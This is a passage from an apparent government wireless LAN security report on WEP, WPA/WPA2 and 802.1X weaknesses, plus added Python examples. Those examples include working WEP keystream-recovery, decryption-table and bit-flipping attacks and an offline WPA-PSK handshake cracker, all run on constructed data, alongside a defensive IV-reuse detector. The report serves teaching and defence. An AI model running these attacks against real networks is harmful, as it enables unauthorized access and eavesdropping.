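The shared-key authentication flaw above, together with the keystream re-use, decryption-table and CRC-32 integrity weaknesses discussed in 4.3 and 5.3, as an added example that is not part of the original report. The WEP key, IVs and frames are constructed; RC4 is implemented inline so that the script runs with the Python standard library only. The attacker functions never see the key.

```python
"""WEP encryption and three attacks that need no key: keystream recovery from
the shared-key challenge, decrypting a later frame with the same IV from a
keystream table, and undetected bit-flipping thanks to the linear CRC-32.
Key, IVs and frame contents are constructed sample values."""
import zlib
from typing import Dict


def rc4(key: bytes, length: int) -> bytes:
    """Generate `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return IV || RC4(IV||key) XOR (plaintext || ICV). The IV travels in the clear."""
    body = plaintext + crc32(plaintext)
    return iv + xor(rc4(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Decrypt and verify the ICV as a receiver would; raises ValueError on failure."""
    iv, ct = frame[:3], frame[3:]
    body = xor(rc4(iv + key, len(ct)), ct)
    plaintext, icv = body[:-4], body[-4:]
    if crc32(plaintext) != icv:
        raise ValueError("ICV check failed")
    return plaintext


# Attack 1 (4.2.2 / 4.3.2): known plaintext (the auth challenge) XOR ciphertext = keystream
def keystream_from_known_plaintext(frame: bytes, known_plaintext: bytes) -> bytes:
    return xor(frame[3:], known_plaintext + crc32(known_plaintext))


# Attack 2 (5.3.4): a table indexed by IV decrypts any frame that reuses that IV
def decrypt_with_table(table: Dict[bytes, bytes], frame: bytes) -> bytes:
    iv, ct = frame[:3], frame[3:]
    ks = table[iv]
    if len(ks) < len(ct):
        raise KeyError("recorded keystream for this IV is too short")
    return xor(ks, ct)[:-4]


# Attack 3 (4.3.3): CRC-32 is affine, crc(m ^ d) = crc(m) ^ crc(d) ^ crc(0..0),
# so the encrypted ICV can be corrected for any XOR delta without the key.
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    iv, ct = frame[:3], frame[3:]
    assert len(delta) == len(ct) - 4, "delta must cover the whole payload"
    icv_fix = xor(crc32(delta), crc32(bytes(len(delta))))
    return iv + xor(ct[:-4], delta) + xor(ct[-4:], icv_fix)


def demo() -> dict:
    key = bytes.fromhex("0102030405")            # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"
    challenge = bytes(range(128))                # 128-byte shared-key auth challenge
    auth_frame = wep_encrypt(key, iv, challenge)  # the station's encrypted response

    ks = keystream_from_known_plaintext(auth_frame, challenge)  # no key involved
    table = {iv: ks}

    # A later data frame that reuses IV 112233 is readable from the table alone
    data_frame = wep_encrypt(key, iv, b"GET /secret HTTP/1.0\r\n")
    leaked = decrypt_with_table(table, data_frame)

    # Attacker rewrites a ciphertext; the receiver's ICV check still passes
    original = b"PAY alice 0010"
    frame = wep_encrypt(key, b"\x44\x55\x66", original)
    delta = xor(original, b"PAY mallo 9999")
    tampered = wep_decrypt(key, flip_bits(frame, delta))
    return {"keystream_ok": ks == rc4(iv + key, len(ks)), "leaked": leaked, "tampered": tampered}


if __name__ == "__main__":
    print(demo())
```

The same keystream recovery is what makes the "Open System plus WEP" recommendation above meaningful: without the challenge exchange, an attacker needs some other known plaintext (or a weak-IV statistical attack) to obtain a keystream. Note also that flipping a single ciphertext bit without the ICV correction is rejected, which is exactly why the correction in `flip_bits` is the interesting part.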
4.2.3 802.1X/EAP Vulnerabilities

First adopted for wireless LANs in WPA, the 802.1X framework has the potential to greatly improve the authentication capabilities of 802.11 wireless networks. Ironically, the authentication protocol specified by 802.1X is vulnerable to attack primarily due to its inability to authenticate its own messages. Because of this flaw, EAP messages may be forged in a man-in-the-middle scenario, potentially allowing an attacker to bypass an authentication mechanism or to hijack an 802.11 session [20].

4.3 WEP Vulnerabilities

4.3.1 General

Numerous reports and articles [6,7,8,9,10,11] have been published about the security vulnerabilities of the implementation of WEP. These reports focus on the minimal security offered by the WEP protocol, in particular the following weaknesses:

a. High probability of keystream re-use due to the short IV (on a busy network, IV re-use occurs often enough that an attacker may recover keystreams, and ultimately the key, in minutes to hours);
b. Weak message authentication, since the integrity check is an unkeyed CRC-32; and
c. Lack of a key management specification.

4.3.2 Keystream Re-use

Because of the relatively short 24-bit IV, it is highly likely that over a short period of time on an active wireless network an IV, and therefore an RC4 keystream, will be re-used. This facilitates an attack on the system to recover the plaintext [7]. This vulnerability exists regardless of whether 64-bit or 128-bit WEP is used.

4.3.3 Message Integrity

The CRC-32 checksum is used to ensure the integrity of packets during transmission. Because CRC-32 is linear and unkeyed, it is possible for controlled changes to be made to the ciphertext while the encrypted checksum is adjusted to match, and to inject messages without detection [9].

4.3.4 Key Management

The distributed shared key is the weakest aspect of the system. By using static shared keys, distributed among all the clients as "passwords," the number of users aware of these keys will grow as the network expands.
This creates the following problems:

a. A key shared among many people does not stay secret for long;
b. The manual distribution of a shared key can be time consuming, especially in a large environment with many users. Quite often, this results in the key not being changed as frequently as required; and
c. The frequency of IV re-use increases as the network size expands, which makes the network more vulnerable to attack.

4.4 WPA/WPA2 Vulnerabilities

4.4.1 General

WPA and WPA2 have introduced measures designed to address the major vulnerabilities of WEP; however, a few new vulnerabilities were introduced and some vulnerabilities remain, particularly in WPA, because of the requirement for backwards compatibility and low compute requirements.

4.4.2 Key Management

Although 802.1X authentication support was made mandatory in WPA/WPA2, its use requires an external authentication server, and so the user is given the option of a simple pre-shared key mechanism like that of WEP. Unfortunately, as with WEP, the pre-shared key authentication mechanism for both WPA and WPA2 is vulnerable to key management issues: it is virtually impossible to keep a single shared key secret among a large community, and re-keying and distributing new keys to a large community is likewise difficult.

4.4.3 4-Way Handshake and Weak Passphrase Vulnerability

The Pre-Shared Key mechanism allows the use of the security features in WPA/WPA2 in situations where the additional 802.1X infrastructure is not available. As with the shared key in WEP, all users share a common "secret key". Although the Pre-Shared Key is used as the Pairwise Master Key (PMK) in WPA/WPA2, unlike WEP, the shared key is not used directly as an encryption key; it is instead combined with other session-specific information exchanged during the 4-Way Handshake to generate a Pairwise Transient Key (PTK), which is in turn used to generate dynamic encryption and message integrity keys.

Although the short key and IV re-use issues have been resolved by this mechanism, a pre-shared key in WPA/WPA2 is now vulnerable to dictionary attacks.
By capturing the 4-Way Handshake authentication exchange and using this information along with a dictionary file, it is possible to recover the session keys if the Pre-Shared Key is one of the words in the dictionary; if the shared key is short or very simple, it may even be found through a brute-force search. A successful dictionary attack can lead to two scenarios: recovered session keys can be used to eavesdrop on or disrupt an ongoing session, or the recovered PSK can be used to initiate a new session and allow unauthorized use of the network resources. If this mechanism must be used, it is imperative that a long, non-dictionary passphrase be used to secure the access point.
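The PSK-to-PMK-to-PTK derivation and the offline dictionary attack described here (and again in 5.4.2), as an added example that is not part of the original report. The MAC addresses, nonces and the EAPOL-Key message 2 layout below are constructed, not captured; `build_message2` stands in for the legitimate supplicant whose traffic the attacker only observes. The PBKDF2 and PRF-512 derivations follow IEEE 802.11i, and the MIC is the HMAC-SHA1-128 form used with CCMP.

```python
"""WPA/WPA2-PSK key derivation and the offline dictionary attack on a captured
4-Way Handshake. Everything the "attacker" uses is visible on the air: the
SSID (beacon), both MAC addresses, ANonce (message 1), SNonce and the MIC
(message 2). The handshake here is constructed rather than captured."""
import hashlib
import hmac
from typing import Iterable, Optional


def psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the two addresses and the two nonces exchanged in messages 1 and 2."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, mic_offset: int) -> bytes:
    """Key MIC for WPA2/CCMP: HMAC-SHA1 over the EAPOL-Key frame with the MIC field zeroed, first 16 bytes."""
    zeroed = eapol_frame[:mic_offset] + bytes(16) + eapol_frame[mic_offset + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


# ---- constructed "capture" of the fields an attacker sees ----
SSID = "CorpGuest"                             # constructed
AA = bytes.fromhex("00112233aabb")             # AP (authenticator) address, constructed
SPA = bytes.fromhex("0a1b2c3d4e5f")            # client (supplicant) address, constructed
ANONCE = bytes(range(32))                      # nonce from message 1, constructed
SNONCE = bytes(range(32, 64))                  # nonce from message 2, constructed
# EAPOL-Key layout: EAPOL hdr(4) + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + key IV(16) + RSC(8) + key ID(8) = 81, then MIC(16), key data len(2)
MIC_OFFSET = 81


def build_message2(passphrase: str) -> bytes:
    """The legitimate supplicant computing message 2; the attacker only sees the output."""
    header = (b"\x02\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x10" + bytes(8)
              + SNONCE + bytes(16) + bytes(8) + bytes(8))
    assert len(header) == MIC_OFFSET
    frame = header + bytes(16) + b"\x00\x00"    # MIC placeholder, empty key data
    ptk = derive_ptk(psk_to_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    kck = ptk[:16]                              # Key Confirmation Key = first 128 bits of PTK
    mic = eapol_mic(kck, frame, MIC_OFFSET)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(message2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack: derive the KCK for each candidate passphrase and compare the MIC.
    Returns the passphrase on a match, None if the wordlist is exhausted."""
    observed_mic = message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        ptk = derive_ptk(psk_to_pmk(candidate, SSID), AA, SPA, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], message2, MIC_OFFSET), observed_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = build_message2("correct horse")
    print(crack_psk(captured, ["123456", "password", "correct horse", "letmein"]))
```

The 4096-iteration PBKDF2 is the only cost the attacker pays per candidate, and it is per SSID, not per network: a table of PMKs precomputed for common SSIDs removes even that. Hence the report's insistence on a long, non-dictionary passphrase (and a non-default SSID) whenever PSK mode is used.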
4.4.4 WPA MIC Spoofing Countermeasure

As described earlier in this document, the Michael MIC algorithm in WPA was chosen for a balance between data integrity, security and reduced processing requirements in order to be supported on existing wireless LAN hardware. Although an improvement over the original CRC-32 used in WEP, the Michael algorithm is invertible and its key discoverable, and it is therefore vulnerable to spoofing attacks. To address this vulnerability, designers of the WPA standard implemented a spoofing countermeasure, which terminates the wireless connection for one minute if two bad MICs are received within any one minute period. Unfortunately, this countermeasure is in itself a vulnerability because it may be used as a doorway to Denial-of-Service attacks (by deliberately injecting packets with bad MICs), and in noisy RF environments, where packet errors are common, this countermeasure can inadvertently trigger and negatively affect the robustness of the wireless network.

4.5 Configuration Defaults

In order to simplify the initial configuration process, many vendors provide a factory default configuration that provides very little security.
For example, some vendors' factory defaults permit configuration of the AP from the wireless segment, do not implement any security, and use documented default system settings such as IP addresses, administrator password, and SSID. Many APs also have an easily accessible reset button that will reset the device's configuration back to these same insecure factory default settings, which requires a degree of physical security/access control to prevent.

More recently, APs have been introduced which do enable security settings by default, but for simplicity and ease of configuration many will only use WEP with a 40-bit key, even though stronger mechanisms may actually be supported by the device.

4.6 Simple Network Management Protocol (SNMP)

Many 802.11 APs support management of the wireless device via SNMP. Often, this feature permits someone to view system and configuration information and, in some cases, allows the capability to update this information. Access to this information is normally restricted by the use of a community string, which is not a password but simply an identifier given to the SNMP network. Further, this string is usually a well-known value, obtainable by a simple Internet search, or easily guessable (e.g. "GovernmentofCanada", "DND", "DFAIT").
5 Exploits

5.1 Network Discovery and Access Attacks

5.1.1 General

War driving is a term derived from war dialing. War dialing, a technique employed by hackers for many years, is the use of software to automatically and systematically dial telephone numbers to discover vulnerable modems through which a hacker can connect and break into a network. War driving exploits the same kind of vulnerability as war dialing. A war driving attacker drives around with a portable wireless client looking for unprotected entry points into a wireless network. War driving has become a sport among the hacking community, who regularly update Internet-accessible maps (e.g. www.wigle.net) of wireless access points for communities around the world. In most cases, war driving is about the challenge of discovering a new access point before any other hacker, and illicit access to networks is not performed; however, many commercial and free hacker tools which exploit the vulnerabilities described in this document are available for all 802.11-based wireless networks and can be used by less ethical individuals for network penetration.

5.1.2 Network Discovery

Network discovery tools or network auditing tools are software developed to help network administrators manage and troubleshoot network problems. Most network auditing tools used by network administrators are quite sophisticated and expensive, making them unpopular for war driving use. However, various free discovery software packages are publicly available and very simple to use [13]; they scan for networks and log detailed information, including SSID, AP MAC address, vendor information, signal-to-noise ratio, and whether security features are enabled.
A war driver equipped with a network discovery package, an 802.11-enabled notebook, and a Global Positioning System (GPS) receiver can log the exact latitude and longitude of the APs in addition to the information mentioned above.

5.1.3 Network Access via Wireless Router

Most APs sold today also have a router built in, often with Dynamic Host Configuration Protocol (DHCP) services enabled. These wireless routers are particularly vulnerable to bandwidth hijacking attacks. When a wireless router is discovered, an attacker simply requests an IP address from the DHCP server, or restarts his network connection and has an IP address automatically assigned. If security features are not enabled, the attacker will have complete access to the target network.
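What a discovery tool extracts from a single beacon, as an added example that is not part of the original report: a parser for the 802.11 beacon frame (MAC header, capability information and the tagged information elements) that reports the SSID, BSSID, channel and whether the network is open, WEP, WPA or WPA2/RSN, i.e. the fields listed in 5.1.2. The `build_beacon` helper constructs the sample beacons; no live capture or radio is involved, and the BSSIDs and SSIDs are made up.

```python
"""Beacon frame parser: the part of a war-driving tool that turns a captured
management frame into an SSID / BSSID / channel / security log entry.
Sample beacons are constructed by build_beacon, not captured."""
import struct
from typing import Dict, List, Tuple

TAG_SSID, TAG_DS_PARAMS, TAG_RSN, TAG_VENDOR = 0, 3, 48, 221
WPA_OUI_TYPE = bytes.fromhex("0050f201")   # Microsoft OUI + type 1 = WPA information element
CAP_PRIVACY = 0x0010                        # Capability Information: Privacy (WEP/TKIP/CCMP required)


def parse_ies(buf: bytes) -> List[Tuple[int, bytes]]:
    """Walk the information element list: 1-byte element ID, 1-byte length, value."""
    ies, i = [], 0
    while i + 2 <= len(buf):
        tag, length = buf[i], buf[i + 1]
        if i + 2 + length > len(buf):
            raise ValueError("truncated information element")
        ies.append((tag, buf[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def parse_beacon(frame: bytes) -> Dict[str, object]:
    """Return the fields a discovery tool records from one beacon."""
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    if fc & 0x00FC != 0x0080:               # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    bssid = frame[16:22]                     # Address 3 carries the BSSID in a beacon
    # Fixed body after the 24-byte header: timestamp(8), beacon interval(2), capabilities(2)
    _timestamp, interval, cap = struct.unpack_from("<QHH", frame, 24)
    info: Dict[str, object] = {
        "bssid": ":".join(f"{b:02x}" for b in bssid),
        "ssid": None, "channel": None, "beacon_interval": interval,
    }
    has_rsn = has_wpa = False
    for tag, value in parse_ies(frame[36:]):
        if tag == TAG_SSID:
            # A zero-length SSID is a "hidden" network; the beacon itself still goes out in clear
            info["ssid"] = value.decode("utf-8", "replace") if value else "<hidden>"
        elif tag == TAG_DS_PARAMS and value:
            info["channel"] = value[0]
        elif tag == TAG_RSN:
            has_rsn = True
        elif tag == TAG_VENDOR and value.startswith(WPA_OUI_TYPE):
            has_wpa = True
    if has_rsn:
        info["security"] = "WPA2/RSN"
    elif has_wpa:
        info["security"] = "WPA"
    elif cap & CAP_PRIVACY:
        info["security"] = "WEP"             # Privacy bit set but no WPA/RSN element present
    else:
        info["security"] = "open"
    return info


def build_beacon(ssid: bytes, bssid: bytes, channel: int, security: str) -> bytes:
    """Construct a minimal beacon for the demonstration; security is one of open/WEP/WPA/WPA2."""
    header = struct.pack("<HH", 0x0080, 0) + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = 0x0001 | (CAP_PRIVACY if security != "open" else 0)   # ESS bit always set
    body = struct.pack("<QHH", 0, 100, cap)
    body += bytes([TAG_SSID, len(ssid)]) + ssid
    body += bytes([TAG_DS_PARAMS, 1, channel])
    if security == "WPA2":
        # RSN IE: version 1, group CCMP, one pairwise cipher CCMP, one AKM PSK, RSN capabilities
        rsn = bytes.fromhex("0100000fac040100000fac040100000fac020000")
        body += bytes([TAG_RSN, len(rsn)]) + rsn
    elif security == "WPA":
        # WPA IE: OUI/type, version 1, group TKIP, one pairwise TKIP, one AKM PSK
        wpa = WPA_OUI_TYPE + bytes.fromhex("01000050f20201000050f20201000050f202")
        body += bytes([TAG_VENDOR, len(wpa)]) + wpa
    return header + body


if __name__ == "__main__":
    for sec in ("open", "WEP", "WPA", "WPA2"):
        print(parse_beacon(build_beacon(b"CorpGuest", bytes.fromhex("00112233aabb"), 6, sec)))
```

Everything the parser reports is taken from unencrypted fields, which is the point of 4.1.2: suppressing the SSID only changes the logged name to `<hidden>` and leaves BSSID, channel and security type visible to anyone in range.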
5.2 Denial of Service (DoS) Attacks

5.2.1 General

A DoS attack is one of the most easily and widely carried out attacks against computer networks. This type of attack usually entails taking over or overloading network resources, denying normal operation of the target network.

5.2.2 AP Takeover

Many APs utilize SNMP or a web-based interface for configuration and management. If the community string or administration password is improperly configured or left at its default setting, an intruder can obtain sensitive configuration information from the AP. It may be possible for the intruder to write new configuration to the AP and effectively take ownership of it, denying legitimate clients access to the network.

5.2.3 AP Cloning

AP cloning is sometimes referred to as the "Evil Twin" attack. An attacker physically deploys a malicious AP, or a laptop equipped with a wireless card and appropriate software, and broadcasts the same SSID but with a higher RF signal strength than the target AP, causing the wireless clients to associate with this rogue AP. Most client cards will, by default, switch over to the more powerful AP to ensure connectivity. Typically, the clients will automatically attempt to authenticate with the new AP, thus providing the attacker with a set of valid credentials which can then be used to connect with the real AP. The attacker who controls the malicious AP also has the opportunity to exploit any security weakness that may be present on the client devices falsely associated with the rogue base station.
AP cloning is more difficult than simply denying clients access to a base station because it requires the physical deployment of a modified AP, or a laptop and wireless card, that has a more powerful output or is located physically closer than the original AP.

5.2.4 RF Jamming

An RF jamming attack is not the same type of attack as overloading of network resources. Instead of creating spurious data to overwhelm the processing capability of network devices, RF jamming overwhelms the medium used for transmission, in this case radio waves. An attacker with very simple tools can easily flood the medium used by the network (in the case of 802.11b/g/n, the 2.4 GHz radio frequency band) with noise. RF jamming is very effective because it works against all WLAN security safeguards. When noise is injected at the WLAN operating frequency, the signal-to-noise ratio drops below an acceptable level and the network simply ceases to function.
5.3 WEP Protocol Attacks

5.3.1 General

The optional WEP algorithm defined in the IEEE 802.11 standard was intended to provide data confidentiality equivalent to that of a basic unprotected wired network. Many reports and articles [10,11,14,15] have been published describing attacks exploiting the various weaknesses and design flaws in the WEP protocol. These attacks are easy to perform using readily available equipment. The attacks apply equally to the 40-bit and 104-bit versions of WEP, as well as other non-standard key length variants.

5.3.2 Passive Attack

Passive attacks exploit the keystream/IV re-use weakness caused by WEP's poor use of the RC4 algorithm. An eavesdropper intercepts all wireless traffic, collects packets where IV collisions occur, and performs statistical analysis of these packets to obtain the encryption key. The encryption key can then be used to access the WLAN. Tools that perform this type of attack are freely available on the Internet [15,16].

5.3.3 Active Attacks

A couple of different types of active attack are possible against an 802.11 WLAN installation. The first type of active attack involves creating or modifying packets for injection into the network for malicious purposes and requires access to the wired side of the network. Injecting packets in plaintext and then intercepting the encrypted version of this known packet as it is broadcast over the wireless network allows an attacker to extract the keystream used for encryption. Malicious commands or viruses can also be injected into the network using this type of attack.

The other type of active attack is possible entirely from the wireless side of the network. This class of attack, which includes spoofing, man-in-the-middle and packet injection attacks, is possible from the wireless side of the network alone.
For example, an active version of an attack against the IV re-use vulnerability of WEP is possible and involves spoofing and injecting packets onto the wireless network, which results in many packets with different IVs being returned. Because of this property, this active attack can dramatically cut down on the packet collection time required in the passive version of the attack described above and can result in an attacker breaking WEP in seconds or minutes as opposed to hours or days. Similarly, an active attack against the weak CRC integrity check [22] is possible by intercepting an encrypted packet, modifying selected portions of the packet that are not adequately protected by the CRC, replacing them with a guessed value and re-broadcasting the modified packet. By progressively guessing and replacing various portions of a packet and watching the re-transmission behaviour, it is possible for an attacker to decrypt WEP-encrypted packets without prior knowledge of the key.

Although active attacks can be extremely effective, they are in general more difficult to
implement and accomplish than a passive attack and require a more in-depth understanding of both the protocols involved and some degree of RF knowledge. In addition, an active attack carries a far greater risk of being detected, as packets must be broadcast or injected into the network by the attacker.

5.3.4 Decryption Table Attack

Using the attacks described in the previous articles, an attacker can determine multiple keystreams and build a decryption table that can be used to decrypt each packet that uses the same IV. Since the IV is transmitted as plaintext, it is easy to match an IV to the keystream in the table and decode the message accordingly. The decryption table can further be used to create new packets with known keystreams and inject false packets into the network. Building this table would require the attacker to record only 1500 bytes of keystream for each of the 2^24 possible IVs, or roughly 24 GB of space [9]. The difficulty of determining keystreams depends on the size of the IV (24 bits), not on the shared key (40 bits); WLANs that use a 104-bit (128-bit) key are therefore just as vulnerable to this attack, since the table is indexed by IV and never needs the key.

5.4 WPA/WPA2 Attacks

5.4.1 General

The WPA and WPA2 security enhancements to 802.11 greatly improve the security and robustness of wireless networks implementing these measures. Although weaknesses and vulnerabilities still exist, comparatively few practical exploits have been found.

5.4.2 Pre-Shared Key Dictionary Attack

WPA and WPA2 attempt to strengthen security by using multiple keys for all operations; however, in the case where a Pre-Shared Key is used, all these additional keys are derived from the shared key, which can be recovered by dictionary or even brute-force attacks using the nonces and MIC captured from the first two messages of the 802.11i 4-Way Handshake. A number of freely available tools exploit this weakness.
Exploitation of the PSK vulnerability is mitigated through the use of 802.1X server-based authentication; however, if the PSK mechanism must be used, a long, non-dictionary passphrase is required.

5.5 Monitoring and Interception Attacks

5.5.1 General

Monitoring and interception attacks involve passive information gathering. The vulnerability to this type of attack is not apparent, but it is equally dangerous and should not be overlooked.
5.5.2 Traffic Sniffing

Once the target wireless network is identified using network discovery techniques, an attacker can set up and sniff any traffic on the target network. Modified versions of device drivers allow the hacker’s wireless client card to operate in promiscuous mode, making this passive attack stealthy and untraceable. The only constraint is that the attacker must be within range of the wireless network, but this range can easily be extended to a couple of hundred metres with the use of an antenna.

Since the 802.11 packet format is a known standard, captured packets can be analyzed to obtain critical information. This information can then be used to aid attacks against WEP if this security feature was enabled. Some commercially available products [17,18] can do this analysis in real time as the packets are captured.

5.5.3 Broadcast Monitoring

Unlike a switch, a hub broadcasts all traffic to all connected devices rather than only to the intended recipient. An AP connected to a hub rather than to a switch will potentially receive and rebroadcast data packets not intended for wireless clients. This allows an attacker to monitor sensitive traffic on the wired side of the network.

5.5.4 Man-in-the-Middle Attack

Most 802.11 APs act as transparent MAC layer bridges, which allow Address Resolution Protocol (ARP) packets to be passed between the wired and wireless networks. This implementation allows for a man-in-the-middle attack against two machines on the wired network connected to the same switch or hub as the AP. Using forged ARP packets, traffic can be redirected through the attacker’s wireless client before it reaches either targeted host.
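The analysis of captured frames described in 5.5.2 and the decryption table of 5.3.4 both rest on one property of WEP: the keystream is fixed by the 24-bit IV, so two frames carrying the same IV are encrypted with the same keystream. The block below is an added example, not code from ITSPSR-21A. It constructs WEP-like frames (3-byte IV, key-index byte, ciphertext) with a hash standing in for RC4, since only the IV-dependence matters here; it reports IV reuse per BSSID the way a wireless IDS would, computes the table size from section 5.3.4, and shows why reuse is fatal: XOR of two ciphertexts under one IV is XOR of the two plaintexts, with the keystream cancelled out. The key, BSSID and payloads are constructed values.

```python
import hashlib
from collections import Counter

# Added example, not code from ITSPSR-21A. Frames are constructed to look like
# WEP data frames (3-byte IV, 1 key-index byte, ciphertext). A hash replaces
# RC4(IV || key); the only property needed is that the keystream is determined
# by (IV, key), exactly as in WEP.

IV_BITS = 24
TYPICAL_MTU = 1500  # keystream bytes per IV assumed in section 5.3.4


def decryption_table_bytes(iv_bits=IV_BITS, bytes_per_iv=TYPICAL_MTU):
    """Size of a complete IV -> keystream table, as estimated in 5.3.4."""
    return (1 << iv_bits) * bytes_per_iv


def toy_keystream(iv, key, length):
    """Stand-in for RC4(IV||key): deterministic for a given (IV, key)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(iv + key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def wep_like_encrypt(iv, key, plaintext, key_id=0):
    """Build a frame: IV (clear) + key index (clear) + plaintext XOR keystream."""
    ks = toy_keystream(iv, key, len(plaintext))
    return iv + bytes([key_id]) + bytes(p ^ k for p, k in zip(plaintext, ks))


def find_iv_reuse(frames):
    """frames: iterable of (bssid, frame_bytes).
    Returns {(bssid, iv): count} for IVs seen more than once on one BSSID,
    which is the condition a WIDS should alert on for a WEP network."""
    seen = Counter((bssid, frame[:3]) for bssid, frame in frames)
    return {key: n for key, n in seen.items() if n > 1}


def xor_of_plaintexts(frame_a, frame_b):
    """For two frames with the same IV, c1 XOR c2 == p1 XOR p2: the shared
    keystream cancels. This is why one known plaintext per IV suffices to
    fill the decryption table of 5.3.4."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs; keystreams do not cancel")
    return bytes(x ^ y for x, y in zip(frame_a[4:], frame_b[4:]))


# Constructed sample capture: one 40-bit key, one BSSID, three frames.
KEY = b"\x01\x02\x03\x04\x05"
BSSID = "00:11:22:33:44:55"
P1 = b"GET /index.html HTTP/1.0"
P2 = b"POST /login HTTP/1.0 abc"
FRAMES = [
    (BSSID, wep_like_encrypt(b"\x00\x00\x01", KEY, P1)),
    (BSSID, wep_like_encrypt(b"\x00\x00\x02", KEY, b"some other packet payload")),
    (BSSID, wep_like_encrypt(b"\x00\x00\x01", KEY, P2)),  # IV reused
]

if __name__ == "__main__":
    print("IV reuse:", find_iv_reuse(FRAMES))
    print("table size: %.1f GiB" % (decryption_table_bytes() / 2 ** 30))
    print("p1 XOR p2 recovered:", xor_of_plaintexts(FRAMES[0][1], FRAMES[2][1]) ==
          bytes(a ^ b for a, b in zip(P1, P2)))
```

With a sequential IV counter the space wraps after 2^24 frames, and with random IVs a collision is expected after only a few thousand frames, so a monitor that alerts on the first duplicate IV per BSSID detects the precondition of this attack long before a table is complete.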
6 Solutions

6.1 Overview

The following articles provide some interim guidelines that are essential to achieve some degree of confidence in the secure operation of a WLAN. Solutions for a more secure WLAN environment will be published as they become available. In the meantime, the following measures should be implemented to immediately enhance the security posture of the WLAN:

a. Determine the range of your network coverage and keep it small;
b. Do not broadcast your SSID;
c. Do not use the default SSID;
d. Use WPA2;
e. Use 802.1X server-based authentication;
f. Change the keys frequently;
g. Use a VPN and firewall to further isolate the WLAN;
h. Use a personal firewall on every wireless client; and
i. Consider using Wireless Intrusion Detection/Prevention Systems.

6.2 Determine Range of Your Network Coverage

Use a wireless sniffer, or any laptop capable of using the 802.11b network, to determine how far away from each access point your WLAN is accessible. This will give you a good idea of how close an unsophisticated attacker or eavesdropper will need to be to have access to your network. Remember that high-gain antennas and/or amplifiers can be used to intercept radio communications from a much greater distance. If the data traveling on your WLAN is extremely valuable or sensitive and could potentially be sought by individuals having access to more sophisticated equipment, you will have to take this into account when determining the coverage of your WLAN.

If your WLAN coverage extends into an adjacent public area, parking lot, or simply too far for your comfort, additional security measures will be needed. Some brands of WLAN devices allow you to change the transmit power level: setting this to a lower level will help reduce the coverage range and the risk of unauthorized WLAN access or eavesdropping. Retrofitting the standard omni-directional antennas with antenna reflectors or replacing them with directional antennas will help focus the RF energy towards desired coverage areas and away from undesired areas, and is also a very effective and relatively inexpensive means of controlling WLAN coverage. Completely preventing radio transmissions from leaving your building may be possible by employing a Faraday cage (1). For highly sensitive information where wireless access is also a requirement, this must be considered. Physical measures of this type are extremely expensive and probably not cost effective for most cases, so the use of strong encryption to protect the information would provide a suitable alternative.

(1) A grounded “cage” structure that is designed to electrically screen an area. This can also be accomplished through the use of conductive wall, floor and ceiling tiles, or conductive paints. A Faraday cage can be used to screen out emitted signals from information systems and can also be employed to protect against lightning strikes and other high energy emissions.

6.3 Do Not Broadcast Your SSID

The APs from most vendors are set up by default to broadcast the network name or SSID of the network. This allows users to see and join the network quickly and easily. Wardrivers are attackers who drive through cities with wireless sniffers to find and log all networks that are broadcasting their presence. If wireless security features are not enabled on your WLAN, anyone who can see your network can join it. Most vendors allow you to turn off the broadcast SSID feature. This is not a complete security solution, but it will provide some protection against casual attacks and eavesdropping.

6.4 Do Not Use the Default SSID

Most APs use well-known defaults as their SSIDs. Using these defaults defeats the effectiveness of disabling SSID broadcast (because default SSIDs are well known) and renders the system more vulnerable. Again, this does not represent a complete security solution, but addressing this concern does provide some protection against casual attacks and eavesdropping.

6.5 Use WPA2

